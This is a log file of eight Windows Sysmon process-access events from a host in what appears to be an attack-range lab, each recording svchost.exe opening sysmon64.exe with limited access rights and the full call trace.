{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3111,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3112,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3113,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3114,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3115,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3116,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3117,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3118,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
